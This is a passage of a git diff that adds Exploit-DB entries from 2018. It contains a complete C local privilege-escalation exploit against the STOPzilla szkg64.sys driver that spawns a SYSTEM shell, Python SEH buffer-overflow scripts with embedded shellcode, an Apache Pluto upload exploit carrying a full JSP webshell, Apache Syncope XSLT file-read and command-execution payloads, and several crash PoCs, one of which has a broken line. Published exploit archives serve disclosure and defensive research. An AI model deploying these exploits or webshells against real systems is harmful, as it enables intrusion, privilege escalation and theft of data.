+        pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize); 
+    } while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);
+	
+    printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken);	
+
+    for (i = 0; i < pSysHandleInfo->NumberOfHandles; i++) 
+    {
+
+        if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == hToken) 
+        {
+            TokenAddress = pSysHandleInfo->Handles[i].Object;	     			  
+        }
+    }
+
+    HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+    return TokenAddress;	
+}
+
+
+
+HANDLE CreateUserToken(HANDLE hToken)
+{
+     _ZwCreateToken               ZwCreateToken;  
+     HANDLE                       hTokenElevated;
+     NTSTATUS                     status;
+     int                          i;
+     DWORD                        dwSize = 0;   
+     TOKEN_USER                   userToken;    
+     PTOKEN_PRIVILEGES            privileges = NULL;
+     PTOKEN_OWNER                 ownerToken = NULL;	
+     PTOKEN_GROUPS                groups = NULL;	
+     PTOKEN_PRIMARY_GROUP         primary_group = NULL; 
+     PTOKEN_DEFAULT_DACL          default_dacl = NULL;      	
+     PLUID                        pluidAuth;
+     LARGE_INTEGER                li;
+     PLARGE_INTEGER               pli;   
+     LUID                         authid = SYSTEM_LUID;
+     LUID                         luid;
+     PSID_AND_ATTRIBUTES          pSid;   
+     SID_BUILTIN                  TkSidLocalAdminGroup = { 1, 2, { 0, 0, 0, 0, 0, 5 }, { 32, DOMAIN_ALIAS_RID_ADMINS } };
+     SECURITY_QUALITY_OF_SERVICE  sqos = { sizeof(sqos), SecurityImpersonation, SECURITY_STATIC_TRACKING, FALSE };	
+     OBJECT_ATTRIBUTES            oa = { sizeof(oa), 0, 0, 0, 0, &sqos }; 
+     TOKEN_SOURCE                 SourceToken  = { { '!', '!', '!', '!', '!', '!', '!', '!' }, { 0, 0 } };	     	     
+     SID_IDENTIFIER_AUTHORITY     nt = SECURITY_NT_AUTHORITY;
+     PSID                         lpSidOwner = NULL;     
+     SID_INTEGRITY                IntegritySIDSystem = { 1, 1, SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_SYSTEM_RID };
+
+
+     ZwCreateToken = (_ZwCreateToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "ZwCreateToken");
+
+     if (ZwCreateToken == NULL)
+     {
+         printf("[-] Unable to resolve ZwCreateToken: %d\n\n", GetLastError());
+         return NULL;
+     }
+    
+     groups = (PTOKEN_GROUPS)GetInfoFromToken(hToken, TokenGroups);   
+     primary_group = (PTOKEN_PRIMARY_GROUP)GetInfoFromToken(hToken, TokenPrimaryGroup);  
+     default_dacl = (PTOKEN_DEFAULT_DACL)GetInfoFromToken(hToken, TokenDefaultDacl);     
+
+     pSid = groups->Groups;
+       
+     for (i=0; i<groups->GroupCount; i++, pSid++) 
+     {        
+        PISID piSid = (PISID)pSid->Sid; 
+           
+        if (pSid->Attributes & SE_GROUP_INTEGRITY)
+        {
+           memcpy(pSid->Sid, &IntegritySIDSystem, sizeof(IntegritySIDSystem));
+        }        
+         
+        if (piSid->SubAuthority[piSid->SubAuthorityCount - 1] == DOMAIN_ALIAS_RID_USERS)
+        {       
+            memcpy(piSid, &TkSidLocalAdminGroup, sizeof(TkSidLocalAdminGroup));  // Found RID_USERS membership, overwrite with RID_ADMINS  
+            pSid->Attributes = SE_GROUP_ENABLED; 
+        } 
+        else 
+        {
+            pSid->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY;
+            pSid->Attributes &= ~SE_GROUP_ENABLED;
+        } 
+     }
+ 
+     pluidAuth = &authid;
+     li.LowPart = 0xFFFFFFFF;
+     li.HighPart = 0xFFFFFFFF;
+     pli = &li;
+              
+     AllocateAndInitializeSid(&nt, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &lpSidOwner);
+     userToken.User.Sid = lpSidOwner;
+     userToken.User.Attributes = 0;
+                
+     AllocateLocallyUniqueId(&luid);
+     SourceToken.SourceIdentifier.LowPart = luid.LowPart;
+     SourceToken.SourceIdentifier.HighPart = luid.HighPart;
+	
+     ownerToken = (PTOKEN_OWNER) LocalAlloc(LPTR, sizeof(PSID));       
+     ownerToken->Owner = GetLocalSystemSID();
+
+     privileges = SetPrivileges();
+    	
+     status = ZwCreateToken(&hTokenElevated,
+                            TOKEN_ALL_ACCESS,
+                            &oa, 
+                            TokenPrimary,
+                            pluidAuth,
+                            pli,
+                            &userToken,               
+                            groups, 
+                            privileges,
+                            ownerToken,
+                            primary_group,
+                            default_dacl,
+                            &SourceToken);
+
+     if (status == STATUS_SUCCESS)
+     {
+         printf("\n[+] New token created successfully\n");         
+         return hTokenElevated;
+     }
+     else
+     {
+//       printf("\n[-] Failed to create new token %08x\n", status);   
+         return NULL;
+     }
+
+     if (lpSidOwner) FreeSid(lpSidOwner);     
+     if (groups) LocalFree(groups);
+     if (privileges) LocalFree(privileges); 
+     if (primary_group) LocalFree(primary_group);   
+     if (default_dacl) LocalFree(default_dacl);      
+     if (ownerToken) { if(ownerToken->Owner) FreeSid(ownerToken->Owner); LocalFree(ownerToken); }
+			
+     return NULL;
+}
+
+
+
+int main(int argc, char *argv[]) 
+{
+
+    QWORD      TokenAddressTarget; 
+    QWORD      SepPrivilegesOffset = 0x40;
+    QWORD      PresentByteOffset;
+    QWORD      EnableByteOffset;
+    QWORD      TokenAddress;
+    HANDLE     hDevice;
+    char       devhandle[MAX_PATH];
+    DWORD      dwRetBytes = 0;             
+    HANDLE     hTokenCurrent;
+    HANDLE     hTokenElevate;  
+
+
+    printf("-------------------------------------------------------------------------------\n");
+    printf("         STOPzilla AntiMalware (szkg64.sys) Arbitrary Write EoP Exploit        \n");
+    printf("                 Tested on 64bit Windows 7 / Windows 10 (1803)                 \n");
+    printf("-------------------------------------------------------------------------------\n");
+
+    TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
+    printf("\n[i] Address of current process token 0x%p", TokenAddress);
+
+    TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
+    printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten\n", TokenAddressTarget);
+
+    PresentByteOffset = TokenAddressTarget + 0x0;
+    printf("[i] Present bits at 0x%p will be overwritten\n", PresentByteOffset);
+
+    EnableByteOffset = TokenAddressTarget + 0x8;
+    printf("[i] Enabled bits at 0x%p will be overwritten", EnableByteOffset);
+
+    sprintf(devhandle, "\\\\.\\%s", "msprocess");
+
+    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+    
+    if(hDevice == INVALID_HANDLE_VALUE)
+    {
+        printf("\n[-] Open %s device failed\n\n", devhandle);
+        return -1;
+    }
+    else 
+    {
+        printf("\n[+] Open %s device successful", devhandle);
+    }	
+
+    printf("\n[~] Press any key to continue . . .\n");
+    getch();
+       
+    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hTokenCurrent))	
+    {
+        printf("[-] Failed OpenProcessToken() %d\n\n", GetLastError());
+        return NULL;
+    }
+    printf("[+] OpenProcessToken() handle opened successfully");  
+   
+    do 
+    {
+        printf("\n[*] Overwriting _SEP_TOKEN_PRIVILEGES bits");     
+        DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, NULL);
+        DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)EnableByteOffset, 0, &dwRetBytes, NULL);  
+        hTokenElevate = CreateUserToken(hTokenCurrent); 
+        Sleep(500); 
+    } while (hTokenElevate == NULL);
+           
+    if (GetWindowsVersion() == 1) 
+    {
+        printf("[i] Running Windows 7");
+        printf("\n[*] Spawning SYSTEM Shell");
+        spawnShell(hTokenElevate);
+    }
+    if (GetWindowsVersion() == 2) 
+    {
+        printf("[i] Running Windows 10");
+        AddAccountToAdminGroup(hTokenElevate);   
+    }
+    else if (GetWindowsVersion() == 0) 
+    {
+        printf("[i] Exploit not tested on this OS\n\n");
+    }  
+
+    CloseHandle(hDevice);
+
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows/local/45402.py b/exploits/windows/local/45402.py
new file mode 100755
index 000000000..30a7b4f4f
--- /dev/null
+++ b/exploits/windows/local/45402.py
@@ -0,0 +1,51 @@
+# Exploit Title: Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-13
+# Software Link: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe
+# Tested Version: 1.8.2
+# Tested on OS: Windows 7 32bit
+# Steps to Reproduce: 
+# Run the python exploit script, it will create a new file with the name 
+# "exploit.txt" just copy the text inside "exploit.txt" and start the program 
+# and click on "System Setup" in the "Save Path for Snapshot and Record file" field. 
+# Paste the content of "exploit.txt" and click on Save. You will see a calculator poped up.
+ 
+#!/usr/bin/python
+     
+buffer = "A" * 260
+
+NSEH = "\xeb\x06\x90\x90"
+
+SEH = "\x01\x19\x0c\x6a"
+nops = "\x90" * 400
+#badchar \x00\x0a\x0d\x2f
+#msfvenom calculator
+buf =  ""
+buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
+buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
+buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
+buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
+buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
+buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
+buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
+buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
+buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
+buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
+buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
+buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
+buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
+buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
+buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
+buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
+buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
+pad = "B" * (6384 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
+
+payload = buffer + NSEH + SEH + nops + buf + pad
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/45406.py b/exploits/windows/local/45406.py
new file mode 100755
index 000000000..999699778
--- /dev/null
+++ b/exploits/windows/local/45406.py
@@ -0,0 +1,51 @@
+# Exploit Title: Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow
+# Exploit Author : ZwX
+# Exploit Date: 2018-09-13
+# Vendor Homepage : http://www.dvd-photo-slideshow.com/photo-to-video-converter.html
+# Version Software : 8.07
+# Tested on OS: Windows 7 
+# Related Exploit Link : https://www.exploit-db.com/exploits/45353/
+
+'''
+Steps to Reproduce:
+===================
+1.Download and install Photo to Video Converter Professional
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "" then go to Menu -> Help -> Save
+4.Paste the contents of the file (poc.txt) into the input "Registration Name" and click "Activate"
+5.Now the calculator executes!
+'''
+
+#!/usr/bin/python 
+
+from struct import pack
+
+buffer = "\x41" * 256
+a = "\xeb\x06\xff\xff"
+b = pack("<I",0x10015d71)
+calc=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
+"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
+"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
+"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
+"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
+"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
+"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
+"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
+"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
+"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
+"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
+"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
+"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
+"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
+"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
+"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
+"\x8b\x15\x7b\xd2\x2b\xbf\x83")
+nops = "\x90" * 20
+c = "\x44" * 800
+
+poc = buffer + a + b + nops + calc + c
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+ 
+print "POC Created by ZwX"
\ No newline at end of file
diff --git a/exploits/windows/webapps/45396.txt b/exploits/windows/webapps/45396.txt
new file mode 100644
index 000000000..563605aa6
--- /dev/null
+++ b/exploits/windows/webapps/45396.txt
@@ -0,0 +1,99 @@
+# Exploit Title: Apache Portals Pluto 3.0.0 - Remote Code Execution
+# Date: 2018-09-12
+# Exploit Author: Che-Chun Kuo
+# Vendor Homepage: https://portals.apache.org/pluto/
+# Software Link: http://archive.apache.org/dist/portals/pluto/
+# Version: 3.0.0
+# Tested on: Windows
+# Advisory: https://portals.apache.org/pluto/security.html
+# Other Vulnerability Types: Authentication bypass, directory traversal, arbitrary file upload
+# CVE: CVE-2018-1306
+
+# Vulnerability 1: Authentication bypass via HTTP verb tampering
+# Description: Apache Pluto uses web.xml security constraints to control access to resources. 
+# These security constraints have been insecurely defined allowing authentication to be bypassed. 
+# When specific http methods are listed within a security constraint, then only those 
+# methods are protected. Pluto defines the following http methods: GET, POST, and PUT. 
+# Since the HEAD method is not listed, a request with a HTTP HEAD method effectively 
+# circumvents the security policy.
+
+# Vulnerability 2: Remote code execution via arbitrary file upload
+# Description: An attacker can call the PortletV3AnnotatedDemo Multipart Portlet and upload 
+# an arbitrary file. The uploaded file is directly accessible within 
+# the /PortletV3AnnotatedDemo/temp/ directory. This technique allows an unauthenticated 
+# attacker to install a malicious JSP file and remotely execute code on a server running Apache Pluto.
+# Insecure Remediation: This vulnerability was mitigated by moving the /temp directory 
+# outside the /webapps directory and under the Tomcat directory. 
+
+# Vulnerability 3: Directory traversal in multipart file upload 
+# Description: Apache Pluto's multipart file uploader is vulnerable to directory traversal. 
+# An attacker is able to upload a file outside the default /temp directory to an arbitrary location 
+# on the filesystem. The following filename will drop a JSP webshell 
+# into the /webapps/pluto public directory: filename="../../../webapps/pluto/jspshell.jsp". 
+# Leveraging this technique, remote code execution via webshell is still possible despite 
+# remediation in Vulnerability 2. 
+
+# PROOF OF CONCEPT
+# UPLOAD REQUEST 1 - TEMP DIR INSIDE WEBROOT
+
+HEAD /pluto/portal/File%20Upload/__pdPortletV3AnnotatedDemo.MultipartPortlet%21-1517407963%7C0;0/__ac0 HTTP/1.1
+Host: localhost:8080
+Content-Type: multipart/form-data; boundary=XX
+Content-Length: 727
+
+--XX
+Content-Disposition: form-data; name="file"; filename="jspshell.jsp"
+Content-Type: application/octet-stream
+
+<FORM METHOD=GET ACTION='jspshell.jsp'>
+CMD: <INPUT name='cmd' type=text  value="cmd /c dir">
+<INPUT type=submit value='Run'></FORM>
+<%@ page import="java.io.*" %>
+<%
+	String cmd = "whoami";
+	String param = request.getParameter("cmd");
+	if (param != null){ cmd = param; }
+	String s = null;
+	String output = "";
+	try {
+	Process p = Runtime.getRuntime().exec(cmd);
+	BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
+	while((s = sI.readLine()) != null) { output += s+"\r\n"; }
+	}  catch(IOException e) { e.printStackTrace(); }
+%>
+<pre><%=output %></pre>
+--XX--
+
+# UPLOAD REQUEST 2 - TEMP DIR OUTSIDE WEBROOT
+
+HEAD /pluto/portal/File%20Upload/__pdPortletV3AnnotatedDemo.MultipartPortlet%21-1517407963%7C0;0/__ac0 HTTP/1.1
+Host: localhost:8080
+Content-Type: multipart/form-data; boundary=XX
+Content-Length: 748
+
+--XX
+Content-Disposition: form-data; name="file"; filename="../../../webapps/pluto/jspshell.jsp"
+Content-Type: application/octet-stream
+
+<FORM METHOD=GET ACTION='jspshell.jsp'>
+CMD: <INPUT name='cmd' type=text  value="cmd /c dir">
+<INPUT type=submit value='Run'></FORM>
+<%@ page import="java.io.*" %>
+<%
+	String cmd = "whoami";
+	String param = request.getParameter("cmd");
+	if (param != null){ cmd = param; }
+	String s = null;
+	String output = "";
+	try {
+	Process p = Runtime.getRuntime().exec(cmd);
+	BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
+	while((s = sI.readLine()) != null) { output += s+"\r\n"; }
+	}  catch(IOException e) { e.printStackTrace(); }
+%>
+<pre><%=output %></pre>
+--XX--
+
+# EXECUTE CMD
+----------------------------------------
+http://localhost:8080/pluto/jspshell.jsp?cmd=hostname
\ No newline at end of file
diff --git a/exploits/windows/webapps/45400.txt b/exploits/windows/webapps/45400.txt
new file mode 100644
index 000000000..8caaa1e9e
--- /dev/null
+++ b/exploits/windows/webapps/45400.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Apache Syncope 2.0.7 - Remote Code Execution
+# Date: 2018-09-12
+# Exploit Author: Che-Chun Kuo
+# Vendor Homepage: https://syncope.apache.org/
+# Software Link: http://archive.apache.org/dist/syncope/
+# Version: 2.0.7
+# Tested on: Windows
+# Advisory: https://syncope.apache.org/security
+# CVE: CVE-2018-1321, CVE-2018-1322
+
+# Vulnerability 1: Remote code execution by users with report and template privileges
+# Description: A user with access to the Reports and Templates functionality can use XSL Transformations (XSLT) 
+# to perform malicious operations, including but not limited to file read, file write, and code execution. 
+
+# Apache Syncope uses XSLT to export report data into various formats. An attacker can perform malicious 
+# operations by crafting a XSL template, binding the template to a report, executing, then exporting the report. 
+# The following XSL can be used to read the Syncope security.properties file or execute the Windows 
+# calc program, respectively.  
+
+READ security.properties file
+-------------------------------------------
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE xsl:stylesheet [<!ENTITY file SYSTEM "..\webapps\syncope\WEB-INF\classes\security.properties">]>
+<xsl:stylesheet version="1.0" 
+	xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+    <xsl:template match="/">&file;</xsl:template>
+</xsl:stylesheet>
+
+EXECUTE Windows calc program
+-------------------------------------------
+<xsl:stylesheet version="1.0" 
+	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+	xmlns:runtime="http://xml.apache.org/xalan/java/java.lang.Runtime"
+	xmlns:process="http://xml.apache.org/xalan/java/java.lang.Process">
+    <xsl:variable name="rtobject" select="runtime:getRuntime()"/>
+    <xsl:variable name="process" select="runtime:exec($rtobject,'calc')"/>
+    <xsl:variable name="waiting" select="process:waitFor($process)"/>
+    <xsl:value-of select="$process"/>
+</xsl:stylesheet>
+	
+# Vulnerability 2: Information disclosure via FIQL and ORDER BY sorting
+# Description: A user with entitlements to the /syncope/rest/users endpoint can recover sensitive 
+# security values using the fiql and orderby parameters. 
+
+# By default, Apache Syncope prevents sensitive values from being returned when querying 
+# the /syncope/rest/users endpoint. Fields such as securityAnswers or password will always return null. 
+# However the results returned can be filtered or sorted based on sensitive fields. By measuring how 
+# the results are returned the values of the desired fields can be successfully recovered. The fiql parameter 
+# can be used to recover full security answers, and the orderby parameter can be used to recover 
+# full security answers and partial information about password hashes. 
+
+# The fiql parameter allows filtering based on user attributes, including a user's security answer. 
+# By using FIQL filters (i.e. "securityAnswer==a*", "securityAnswer==b*", etc...) a user's 
+# securityAnswer can be recovered one letter at a time. 
+
+# The orderby parameter allows sorting based on user attributes, including a user's security 
+# answer and password. The following example shows how orderby sorting can be exploited. 
+
+# User Bob exists with the security answer "test". A malicious user creates a user Alice with the 
+# security answer "ta". The malicious actor then calls the /syncope/rest/users endpoint with orderby=securityAnswer".
+# By sorting using the "securityAnswer" attribute, the result will have Alice sorted ahead of Bob, 
+# due to the value "ta" being before the value "test". By sequentially changing Alice's security 
+# question and comparing the sorted result, Bob's security answer can be recovered one letter 
+# at a time. A similar technique can be used to reveal partial information about user password hashes.
+
+Orderby Example Results: 
+Alice's security answer, Order of results returned
+ta, [Alice, Bob]
+tb, [Alice, Bob]
+tc, [Alice, Bob]
+td, [Alice, Bob]
+te, [Alice, Bob]
+tf, [Bob, Alice]
+tea, [Alice, Bob]
+teb, [Alice, Bob]
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45404.py b/exploits/windows_x86-64/dos/45404.py
new file mode 100755
index 000000000..dab4610b4
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45404.py
@@ -0,0 +1,28 @@
+# Exploit Title: TeamViewer App 13.0.100.0 - Denial of Service (PoC)
+# Exploit Author: Ali Alipour
+# WebSite: http://Alipour.it
+# Date: 2018-09-13
+# Vendor Homepage: https://www.teamviewer.com
+# Software Link Download:https://www.microsoft.com/en-us/p/teamviewer-remote-control/9wzdncrfj0rh?activetab=pivot%3aoverviewtab
+# Tested on: Windows 10 - 64-bit
+
+# Steps to Reproduce
+# Run the python exploit script, it will create a new 
+# file with the name "TeamViewer.txt" just copy the text inside "TeamViewer.txt"
+# and start the TeamViewer App 13.0.100.0 - In Microsoft Windows 10 . 
+# In The New Window Click On " Login " And Paste "Test@Test.Com" into Email Address Filed . 
+# Now Paste The Content Of "TeamViewer.txt" Into The Field: " Password ". 
+# Click "Sign in" And You Will See a [ Boom !!!! ] - TeamViewer App 13.0.100.0 - In Microsoft Windows 10 Crash.
+
+#!/usr/bin/python
+    
+buffer = "A" * 9000
+payload = buffer
+try:
+    f=open("TeamViewer.txt",22"w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86-64/local/45395.py b/exploits/windows_x86-64/local/45395.py
new file mode 100755
index 000000000..21b37bebc
--- /dev/null
+++ b/exploits/windows_x86-64/local/45395.py
@@ -0,0 +1,25 @@
+# Exploit Title: InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)
+# Discovery by: Luis Martinez
+# Discovery Date: 2018-09-11
+# Vendor Homepage: http://www.indusoft.com/
+# Software Link: http://www.indusoft.com/Products-Downloads
+# Tested Version: 8.1 SP1
+# Vulnerability Type: Local Buffer Overflow (SEH Unicode)
+# Tested on OS: Windows 10 Pro x64 en
+ 
+# Steps to Produce the Local Buffer Overflow (SEH Unicode): 
+# 1.- Run python code: InduSoft_Web_Studio_8.1.py
+# 2.- Open InduSoft_Web_Studio_8.1.txt and copy content to clipboard
+# 3.- Open IWS v8.1 InduSoft Web Studio
+# 4.- Home
+# 5.- Paste ClipBoard on "Tag Name"
+ 
+#!/usr/bin/env python
+
+nSEH = "\x42\x42"
+SEH = "\x43\x43"
+ 
+buffer = "\x41" * 1042 + nSEH + SEH
+f = open ("InduSoft_Web_Studio_8.1.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45397.py b/exploits/windows_x86/dos/45397.py
new file mode 100755
index 000000000..de91c81c2
--- /dev/null
+++ b/exploits/windows_x86/dos/45397.py
@@ -0,0 +1,32 @@
+# Exploit Title: Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)
+# Exploit Author: ZwX
+# Exploit Date: 2018-09-11
+# Vendor Homepage : http://www.clone2go.com/
+# Software Link: http://www.clone2go.com/down/video-to-ipod-setup.exe
+# Tested on OS: Windows 7 
+
+# Proof of Concept (PoC):
+# The local buffer overflow vulnerability can be exploited by local attackers with 
+# restricted system user account without user interaction. For security demonstration 
+# or to reproduce follow the provided information and steps below to continue.
+
+# Manual steps to reproduce the vulnerability ...
+# 1 Install the software and start the client
+# 2 Copy  the AAAA...string from bof.txt to clipboard
+# 3 Run VideoConverter.exex
+# 4 Go Menu Menu > Edit > Options > Set Output folder (Input)
+# 5 Paste it the input AAAA....string and click Open
+# 6 A messagebox opens click ok
+# 7 Software will stable crash or shut down
+# 8 Successful reproduce of the Denial of Service
+
+#!/usr/bin/python
+
+buffer = "\x41" * 430
+
+poc = buffer
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+ 
+print "POC Created by ZwX"
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45403.py b/exploits/windows_x86/local/45403.py
new file mode 100755
index 000000000..05c9a6a07
--- /dev/null
+++ b/exploits/windows_x86/local/45403.py
@@ -0,0 +1,51 @@
+# Exploit Title: Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-13
+# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
+# Tested on OS: Windows 7 32bit
+# Tested Version: 2.6
+# Steps to Reproduce: 
+# Run the python exploit script, it will create a new file with the name "exploit.mp3". 
+# Start the program and click on "Convert". 
+# Find the file "exploit.mp3" and click "Open" 
+# You will see a calculator poped up.
+ 
+#!/usr/bin/python  
+   
+buffer = "A" * 4116
+
+NSEH = "\xeb\x06\x90\x90"
+
+SEH = "\x21\x21\xe4\x66"
+nops = "\x90" * 8
+#badchar \x00\x0a\x0d\x2f
+#msfvenom calculator
+buf =  ""
+buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
+buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
+buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
+buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
+buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
+buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
+buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
+buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
+buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
+buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
+buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
+buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
+buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
+buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
+buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
+buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
+buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
+pad = "B" * (4440 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
+
+payload = buffer + NSEH + SEH + nops + buf + pad
+try:
+    f=open("exploit.mp3","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3eaf91d1c..55f959f94 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6105,6 +6105,10 @@ id,file,description,date,author,type,platform,port
 45389,exploits/windows/dos/45389.py,"PDF Explorer 1.5.66.2 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows,
